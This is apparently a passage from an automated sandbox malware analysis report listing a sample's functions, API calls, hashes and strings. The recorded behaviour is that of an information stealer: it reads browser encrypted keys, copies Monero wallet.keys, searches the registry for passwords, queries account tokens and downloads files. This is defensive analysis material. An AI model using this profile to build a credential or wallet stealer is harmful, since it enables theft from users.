                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: e4bd2a57ddbb077a2f80065831ff444832c0c173a2d7922e1152eec2ab8c53fd
                              • Instruction ID: 3289615a56167fb3fdffcd4f7a1bf4fbde501f193f4a78abf78fcbeaad9f71a6
                              • Opcode Fuzzy Hash: e4bd2a57ddbb077a2f80065831ff444832c0c173a2d7922e1152eec2ab8c53fd
                              • Instruction Fuzzy Hash: 50C172B5A0021DDBCB24EF60DC89FEA7378FF54304F118598E60AA7141DA75AA85CFB1
                              Function 00DF4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF42EC
                              • lstrcat.KERNEL32(?,0197ED10), ref: 00DF430B
                              • lstrcat.KERNEL32(?,?), ref: 00DF431F
                              • lstrcat.KERNEL32(?,0197CE00), ref: 00DF4333
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DF8D90: GetFileAttributesA.KERNEL32(00000000,?,00DE1B54,?,?,00E0564C,?,?,00E00E1F), ref: 00DF8D9F
                                • Part of subcall function 00DE9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00DE9D39
                                • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                                • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                                • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                                • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                                • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                                • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                                • Part of subcall function 00DF93C0: GlobalAlloc.KERNEL32(00000000,00DF43DD,00DF43DD), ref: 00DF93D3
                              • StrStrA.SHLWAPI(?,0197EE30), ref: 00DF43F3
                              • GlobalFree.KERNEL32(?), ref: 00DF4512
                                • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9AEF
                                • Part of subcall function 00DE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B01
                                • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9B2A
                                • Part of subcall function 00DE9AC0: LocalFree.KERNEL32(?,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF44A3
                              • StrCmpCA.SHLWAPI(?,00E008D1), ref: 00DF44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00DF44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 00DF44E5
                              • lstrcat.KERNEL32(00000000,00E00FB8), ref: 00DF44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 01c9d20967b58ceeb6e8c210b7d117e56c40c58383c455b3fdbec6349802b5bd
                              • Instruction ID: 50aa4f8b5c73b6b6150902118279d98c9dfb8f21a72b15bc7551c29acd1d5a73
                              • Opcode Fuzzy Hash: 01c9d20967b58ceeb6e8c210b7d117e56c40c58383c455b3fdbec6349802b5bd
                              • Instruction Fuzzy Hash: A37137B6900208ABCB24FBA4DC95FEE7379AB48300F148598F609A7185DE75DB45CFB1
                              Function 00DE1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DE12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DE12B4
                                • Part of subcall function 00DE12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00DE12BB
                                • Part of subcall function 00DE12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00DE12D7
                                • Part of subcall function 00DE12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00DE12F5
                                • Part of subcall function 00DE12A0: RegCloseKey.ADVAPI32(?), ref: 00DE12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00DE134F
                              • lstrlen.KERNEL32(?), ref: 00DE135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00DE1377
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,01979D18,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00DE1465
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                                • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                                • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                                • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                                • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                                • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00DE14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 694b7599c03a9d0d8ca99cff294e915b89dde7e5553e13e5718c4abb107936ce
                              • Instruction ID: 6c17fdf23f5395240724fc906552423c6f551bd5284bb0bc174584e66f93a9ab
                              • Opcode Fuzzy Hash: 694b7599c03a9d0d8ca99cff294e915b89dde7e5553e13e5718c4abb107936ce
                              • Instruction Fuzzy Hash: D1512EF195021997CB25FB64DD92AED737CEF50300F4181A8B70E66082EE746B89CBB5
                              Function 00DE75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DE72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00DE733A
                                • Part of subcall function 00DE72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00DE73B1
                                • Part of subcall function 00DE72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00DE740D
                                • Part of subcall function 00DE72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00DE7452
                                • Part of subcall function 00DE72D0: HeapFree.KERNEL32(00000000), ref: 00DE7459
                              • lstrcat.KERNEL32(00000000,00E017FC), ref: 00DE7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00DE7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00DE765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00DE768F
                              • lstrcat.KERNEL32(00000000,00E01804), ref: 00DE76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00DE76D3
                              • lstrcat.KERNEL32(00000000,00E01808), ref: 00DE76ED
                              • task.LIBCPMTD ref: 00DE76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: e8681721fe8043956a62b7ecc9f1da4a7b8983f571557acfb508209ff12ff536
                              • Instruction ID: 8832eefe7296b19e313e7f0714ce9a3b71c90e5d6bcb827873d08b392c08a861
                              • Opcode Fuzzy Hash: e8681721fe8043956a62b7ecc9f1da4a7b8983f571557acfb508209ff12ff536
                              • Instruction Fuzzy Hash: CA314F75A00249DBCB68FFA5DC59DFE7378EB48301B204118F106A7284DE39A946DB70
                              Function 00DE60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                                • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                              • InternetOpenA.WININET(00E00DF7,00000001,00000000,00000000,00000000), ref: 00DE610F
                              • StrCmpCA.SHLWAPI(?,0197F1D8), ref: 00DE6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00DE618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00DE61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00DE61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DE620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00DE6249
                              • InternetCloseHandle.WININET(?), ref: 00DE6253
                              • InternetCloseHandle.WININET(00000000), ref: 00DE6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: f468309548732481f990e7ce1d2de7c23cb9e552d6bb12c40f42c53d6e9d5c86
                              • Instruction ID: 4983c4b91fdbd00237fe5f8b9746e192f516ac4d5b51b42653c29ebcafed9f11
                              • Opcode Fuzzy Hash: f468309548732481f990e7ce1d2de7c23cb9e552d6bb12c40f42c53d6e9d5c86
                              • Instruction Fuzzy Hash: 89516EB1A00218EBDB20EF51DC45BEE77B8FB44745F108098E709A7184DB75AA85CFB9
                              Function 00DE72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00DE733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00DE73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00DE740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DE7452
                              • HeapFree.KERNEL32(00000000), ref: 00DE7459
                              • task.LIBCPMTD ref: 00DE7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: ba2a972815c4c60bb5c4c829680688c0c10687efd49944229eaf356e8dda9adb
                              • Instruction ID: 5d61987f21070368134c4e0ccd51b8ec5afc415edf1f60a8b275e2c1826a0e0d
                              • Opcode Fuzzy Hash: ba2a972815c4c60bb5c4c829680688c0c10687efd49944229eaf356e8dda9adb
                              • Instruction Fuzzy Hash: 29611AB59042989BDB24EB51DC51BD9B7B8FF44300F0481E9E689A6181EBB05FC9CFB0
                              Function 00DEBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                              • lstrlen.KERNEL32(00000000), ref: 00DEBC9F
                                • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00DEBCCD
                              • lstrlen.KERNEL32(00000000), ref: 00DEBDA5
                              • lstrlen.KERNEL32(00000000), ref: 00DEBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 36582db688aa63c8c43e44538ac26c50a25dd4fe03c2142522e3f9cf8000f6e8
                              • Instruction ID: 466480349c74b5feda3ff6c6356eb341d0cae080d06d67f7c5b28c302d22f1b5
                              • Opcode Fuzzy Hash: 36582db688aa63c8c43e44538ac26c50a25dd4fe03c2142522e3f9cf8000f6e8
                              • Instruction Fuzzy Hash: 93B15FB191011C9BCB14FBA4CC96EFE7338EF54300F558169F60AA6095EF746A49CB72
                              Function 00DF6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 924886a04af39a3cc68d80d4a27c4bab66a3552ca0599b1511b20bf76238bd3c
                              • Instruction ID: b81483b4ae803f9f8c695413070e5cf4afddae1606be2ced5e71c07000805122
                              • Opcode Fuzzy Hash: 924886a04af39a3cc68d80d4a27c4bab66a3552ca0599b1511b20bf76238bd3c
                              • Instruction Fuzzy Hash: DFF05430A04209EFD364AFE0E90972CBB70FB14707F244198E646C7F84DA7A4B41DBA9
                              Function 00DE4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00DE4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DE4FD1
                              • InternetOpenA.WININET(00E00DDF,00000000,00000000,00000000,00000000), ref: 00DE4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00DE5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00DE5041
                              • InternetCloseHandle.WININET(?), ref: 00DE50B9
                              • InternetCloseHandle.WININET(?), ref: 00DE50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
